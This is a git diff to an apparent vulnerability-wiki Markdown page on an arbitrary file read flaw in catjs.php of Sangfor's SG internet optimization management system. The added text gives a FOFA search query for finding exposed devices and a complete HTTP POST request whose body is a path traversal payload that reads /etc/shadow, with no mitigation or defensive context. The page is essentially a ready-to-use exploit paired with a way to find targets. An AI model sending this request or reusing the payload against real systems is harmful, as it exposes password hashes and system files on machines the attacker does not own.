diff --git "a/\346\267\261\344\277\241\346\234\215SG\344\270\212\347\275\221\344\274\230\345\214\226\347\256\241\347\220\206\347\263\273\347\273\237_catjs.php_\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md" "b/\346\267\261\344\277\241\346\234\215SG\344\270\212\347\275\221\344\274\230\345\214\226\347\256\241\347\220\206\347\263\273\347\273\237_catjs.php_\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md"
index 9aceade..b39d3d4 100644
--- "a/\346\267\261\344\277\241\346\234\215SG\344\270\212\347\275\221\344\274\230\345\214\226\347\256\241\347\220\206\347\263\273\347\273\237_catjs.php_\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md"
+++ "b/\346\267\261\344\277\241\346\234\215SG\344\270\212\347\275\221\344\274\230\345\214\226\347\256\241\347\220\206\347\263\273\347\273\237_catjs.php_\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md"
@@ -1,6 +1,27 @@
 ## 深信服SG上网优化管理系统 catjs.php 任意文件读取漏洞
+
+## fofa
+```
+title=="SANGFOR上网优化管理"
 ```
-POST /php/catjs.php
 
-[" ../../../../../../etc/shadow"]
+
 ```
+POST /php/catjs.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: close
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: application/x-www-form-urlencoded
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Content-Length: 32
+
+["../../../../../../etc/shadow"]
+```
+
+![9d1238a7ccbf56f3d36759ead05f1bcf](https://github.com/wy876/wiki/assets/139549762/42238697-6a27-4dbc-b274-db8f83ce6a49)
+